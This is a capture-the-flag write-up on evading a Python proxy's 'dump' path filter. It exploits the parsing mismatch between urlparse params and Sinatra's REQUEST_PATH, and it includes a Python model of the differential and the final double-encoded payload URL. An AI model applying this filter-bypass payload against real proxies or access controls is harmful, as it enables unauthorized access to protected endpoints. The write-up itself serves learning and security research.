Admins connected a debug interface to our Roflscale DB. They didn’t bother to secure it with a password, so we put in a proxy instead.
IP: roflscale.hackable.software:4000
The main idea of this challenge is a parsing mismatch between Python's urlparse and Sinatra's REQUEST_PATH in Ruby: if we craft a payload that slips past the Python 'dump' filter but still reaches the Ruby web server as a '/dump' path, we get the flag.
The proxy.py takes the URL, unquotes and parses it with urlparse, then checks whether the path contains the string 'dump' -> GTFO; otherwise it rebuilds the URL with urlunparse and forwards it to the Ruby web server.
In the Ruby web server, if REQUEST_PATH ends with '/dump' it reads the flag for us.
After several hours of testing, I figured out that urlparse has params, but Sinatra does not!
For example, given the request path /aaa;bbb:
urlparse:
  path = /aaa
  params = bbb
Sinatra (Ruby):
  path = /aaa;bbb
The only remaining problem is that REQUEST_PATH must end with '/dump', not just 'dump'. If we feed /flag.txt;/dump to urlparse, it treats '/dump' as part of the path rather than as params, because urlparse only splits params on a ';' that appears after the last '/' in the URL, and then the filter catches it.
Double-encoding the slash solved the problem: the proxy's single unquote turns %252f into %2f, which contains no literal '/', so urlparse keeps 'dump' out of the path and urlunparse forwards /flag.txt;%2fdump unchanged, and the Ruby side ends up with a REQUEST_PATH ending in '/dump'.
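To see the differential offline, here is an added Python model of the two sides. It is not the challenge's proxy.py or the Ruby server; the proxy model follows the behaviour described above (unquote once, urlparse, reject if 'dump' is in the path, urlunparse), and the backend model is an assumption that the Ruby side percent-decodes the request target once and never splits ';' params.

```python
from urllib.parse import unquote, urlparse, urlunparse


def proxy_forward(raw_target: str):
    """Model of the proxy's filter (assumed shape, not the original proxy.py).

    Returns the URL that would be forwarded to the backend, or None if the
    request is blocked because urlparse's .path contains 'dump'.
    """
    decoded = unquote(raw_target)          # the proxy unquotes exactly once
    parts = urlparse(decoded)              # Python splits ';params' off the path
    if "dump" in parts.path:
        return None                        # -> GTFO
    return urlunparse(parts)               # params are glued back on with ';'


def backend_request_path(forwarded_target: str) -> str:
    """Model of what the Ruby side sees as REQUEST_PATH (assumption: it strips the
    query string, percent-decodes once, and treats ';' as ordinary path bytes)."""
    path_only = forwarded_target.split("?", 1)[0]
    return unquote(path_only)


def reaches_dump(raw_target: str) -> bool:
    """Full chain: does this request pass the proxy and end in '/dump' on the backend?"""
    forwarded = proxy_forward(raw_target)
    if forwarded is None:
        return False
    return backend_request_path(forwarded).endswith("/dump")


def urlparse_split(target: str):
    """Show how urlparse divides a target into path and params."""
    parts = urlparse(target)
    return parts.path, parts.params


if __name__ == "__main__":
    # Constructed request targets, the last one being the writeup's payload.
    for target in ["/dump", "/flag.txt;dump", "/flag.txt;%2fdump", "/flag.txt;%252fdump"]:
        fwd = proxy_forward(target)
        print(f"{target:24} proxy -> {fwd!r:24} "
              f"backend path -> {backend_request_path(fwd) if fwd else None!r:20} "
              f"flag: {reaches_dump(target)}")
```

The single-encoded variant /flag.txt;%2fdump is blocked because after one unquote the target is /flag.txt;/dump, where the ';' sits before the last '/', so urlparse leaves it all in the path. With %252f the proxy only ever sees %2f, urlparse moves everything after ';' into params, and the rebuilt URL still carries the encoded slash for the backend to decode.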
Our final payload:
http://roflscale.hackable.software:4000/flag.txt;%252fdump
Flag: DrgnS{P4th_p4rAm5_aR3_4W350mE}